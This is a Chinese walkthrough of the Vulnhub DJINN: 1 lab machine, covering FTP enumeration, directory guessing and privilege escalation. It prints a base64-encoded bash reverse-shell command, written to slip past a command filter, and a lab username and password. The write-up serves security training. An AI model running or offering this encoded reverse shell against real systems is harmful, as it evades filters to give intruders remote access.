Vulnhub-靶机-DJINN: 1

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的，那么本次演示就是arp-scan工具发现

地址:https://www.vulnhub.com/entry/djinn-1,397/

nmap扫描结果如下：

开放了3个端口，21，1337，7331，根据扫描结果知道目标ftp可以使用匿名登录，我们先看看

使用lftp命令登录上去，通过mget批量下载目标文件到本地，查看到如下结果：

上面得到的结果暂时还没发现有什么好利用的，就先放着，我们看看扫描出来的端口7331，通过nc连接此端口， 返回有类似html的页面，就使用浏览器访问看看

得到如上页面，那么我们先不管，直接下载https://github.com/OJ/gobuster/releases 使用gobuster进行目标猜解看看

访问wish目录发现存在执行命令的窗口，但是发现过滤了一些反弹shell的命令参数，尝试使用base64编码的形式进行反弹，具体如下

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMS84ODMzIDA+JjE= | base64 -d | bash

成功反弹shell

我这里执行iidd是终端显示问题，实际操作没啥问题，在反弹的shell中查看当前py文件，发现如下重要信息

nitish:p4ssw0rdStr3r0n9

使用su切换到账户nitish ，切换用户成功之后做了如下操作：

通过查询man手册发现一个带执行命令的参数-cmd ，试了几下，确认是随便写字符就可以跳转到另一个用户

得到如上信息，离root权限就不远了，执行下sudo指定的文件

切换到sam的家目录下，发现隐藏文件

通过nc下载到本地将pyc还原成py代码，确认python代码存在漏洞，具体详情可以看看https://www.geeksforgeeks.org/vulnerability-input-function-python-2-x/